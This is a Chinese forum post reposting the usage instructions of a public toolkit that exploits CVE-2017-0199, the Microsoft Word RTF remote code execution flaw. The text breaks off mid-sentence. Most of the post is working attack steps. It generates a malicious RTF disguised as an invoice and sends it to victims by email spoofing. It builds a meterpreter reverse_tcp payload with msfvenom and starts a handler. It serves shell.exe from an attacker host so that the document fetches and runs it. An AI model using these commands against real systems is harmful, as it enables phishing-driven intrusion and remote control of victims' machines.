admin 发表于 2018-1-22 21:04:39

CVE-2017-0199 – v2.0

项目地址
https://github.com/bhdresh/CVE-2017-0199
CVE-2017-0199 – v2.0
CVE-2017-0199 – v2.0是一个比较方便测试CVE-2017-0199的python脚本,它提供了一种快速有效的方式来利用Microsoft RTF RCE。它可以生成恶意的RTF文件,并将metasploit/meterpreter有效载荷发送给受害者,而不需要任何复杂的配置。
版本:Python版本2.7.13- Generate Malicious RTF file using toolkit- Run toolkit in an exploitation mode as tiny HTA + Web server视频教程

https://youtu.be/42LjG7bAvpg
用法
工具包含以下功能- Automatically send generated malicious RTF to victim using email spoofing例:


[*]步骤1:使用以下命令生成恶意RTF文件,并将其发送给受害者
Syntax:# python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u <http://attacker.com/test.hta>Example:# python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc
[*]步骤2(可选,如果使用MSF的有效载荷):生成metasploit payload并启动监听程序
Example:Generate Payload:# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exeStart Handler:# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1
[*]步骤3:在开发模式下启动工具包生成payload
Syntax:# python cve-2017-0199_toolkit.py -M exp -e <http://attacker.com/shell.exe> -l </tmp/shell.exe>Example:# python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe命令行参数# python cve-2017-0199_toolkit.py -hThis is a handy toolkit to exploit CVE-2017-0199 (Microsoft Word RTF RCE)Modes:-M gen                                          Generate Malicious RTF file only   Generate malicious RTF file:      -w <Filename.rtf>                   Name of malicious RTF file (Share this file with victim).      -u <http://attacker.com/test.hta>   The path to an hta file. Normally, this should be a domain or IP where this tool is running.                                             For example, http://attackerip.com/test.hta (This URL will be included in malicious RTF file and                                             will be requested once victim will open malicious RTF file.-M exp                                          Start exploitation mode   Exploitation:      -p <TCP port:Default 80>            Local port number.      -e <http://attacker.com/shell.exe>The path of an executable file / meterpreter shell / payloadwhich needs to be executed on target.      -l </tmp/shell.exe>               Local path of an executable file / meterpreter shell / payload (If pay免责声明
页: [1]
查看完整版本: CVE-2017-0199 – v2.0